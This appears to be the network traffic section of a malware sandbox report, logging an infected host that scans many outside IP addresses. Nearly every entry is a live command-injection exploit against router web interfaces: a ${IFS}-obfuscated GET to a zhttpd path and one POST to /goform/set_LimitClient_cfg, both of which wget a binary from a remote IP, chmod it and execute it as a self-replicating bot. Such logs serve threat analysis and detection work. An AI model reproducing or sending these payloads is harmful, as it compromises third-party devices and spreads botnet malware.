                                        Mar 31, 2024 09:21:44.143798113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5736192.168.2.2337654149.204.98.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143862963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5737192.168.2.2350328217.246.252.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143892050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5738192.168.2.2353528134.215.42.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143949032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5739192.168.2.233962496.224.235.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143981934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5740192.168.2.2359760115.9.41.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144062042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5741192.168.2.2354314172.169.199.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144092083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5742192.168.2.23456228.126.53.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144129992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5743192.168.2.235081643.3.254.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144174099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5744192.168.2.235477471.64.102.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144237995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5745192.168.2.2333588200.77.142.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144279957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5746192.168.2.235253613.47.69.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144329071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5747192.168.2.233552235.233.171.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144390106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5748192.168.2.2346552168.168.10.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144447088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5749192.168.2.2344092199.206.225.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144476891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5750192.168.2.2349472158.18.220.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144520044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5751192.168.2.234230496.253.189.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144563913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5752192.168.2.2359394204.72.184.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144623995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5753192.168.2.2358282103.25.37.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144679070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5754192.168.2.2350476178.11.115.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144718885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5755192.168.2.2347680101.14.242.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144771099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5756192.168.2.2349494185.255.231.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.144819975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5757192.168.2.2348832161.191.10.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152606964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5758192.168.2.2359266121.76.134.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152641058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5759192.168.2.2347614183.234.231.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152689934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5760192.168.2.234163082.92.120.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152744055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5761192.168.2.235931896.110.113.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152777910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5762192.168.2.2333052176.217.0.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152831078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5763192.168.2.235796446.109.94.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152890921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5764192.168.2.2345928194.86.155.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152931929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5765192.168.2.234398641.181.131.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.152965069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5766192.168.2.2334180183.153.137.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.153039932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5767192.168.2.234757617.77.175.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.153115988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5768192.168.2.233448866.92.91.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.153151989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5769192.168.2.2335562180.248.111.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.153268099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5770192.168.2.2342870198.117.163.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.153321981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5771192.168.2.2340442136.208.118.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.153399944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5772192.168.2.235936212.67.94.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.153460026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5773192.168.2.2339104129.138.51.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.153510094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5774192.168.2.234773247.12.82.1708080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.810961008 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:44.957555056 CEST398INHTTP/1.1 200 Ok
                                        Server:
                                        Date: Sun, 31 Mar 2024 07:21:44 GMT
                                        Cache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0
                                        Content-Type: text/html; charset=utf-8
                                        Last-Modified: Mon, 11 Mar 2024 21:12:22 GMT
                                        X-Frame-Options: SAMEORIGIN
                                        X-XSS-Protection: 1; mode=block
                                        X-Content-Type-Options: nosniff
                                        Strict-Transport-Security: max-age=31536000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5775192.168.2.2345426176.26.177.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135126114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5776192.168.2.2352430203.69.163.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135168076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5777192.168.2.2347636206.109.131.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135219097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5778192.168.2.2337674125.44.244.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135241985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5779192.168.2.2351330212.228.146.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135279894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5780192.168.2.2359878112.165.13.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135334015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5781192.168.2.2339808137.21.198.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135571957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5782192.168.2.234865298.184.202.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135629892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5783192.168.2.2351600155.114.244.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135663986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5784192.168.2.2340428163.156.37.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:45.135701895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5785192.168.2.233751870.216.80.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:46.176846981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5786192.168.2.2355088201.149.26.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:47.182287931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5787192.168.2.2357950141.158.219.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:47.182454109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5788192.168.2.2351890167.69.52.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:48.190619946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5789192.168.2.2343042134.199.214.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:48.190779924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5790192.168.2.2341612103.121.136.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:48.190860987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5791192.168.2.2339056147.152.34.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:48.190967083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5792192.168.2.2348634187.69.181.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.213939905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5793192.168.2.2349778108.169.158.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214019060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5794192.168.2.234693831.144.165.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214095116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5795192.168.2.234838260.43.133.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214174986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5796192.168.2.235123273.54.42.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214241982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5797192.168.2.235823497.100.221.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214301109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5798192.168.2.23451884.6.215.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214364052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5799192.168.2.2339252189.232.172.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214421034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5800192.168.2.2339024158.90.213.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214483976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


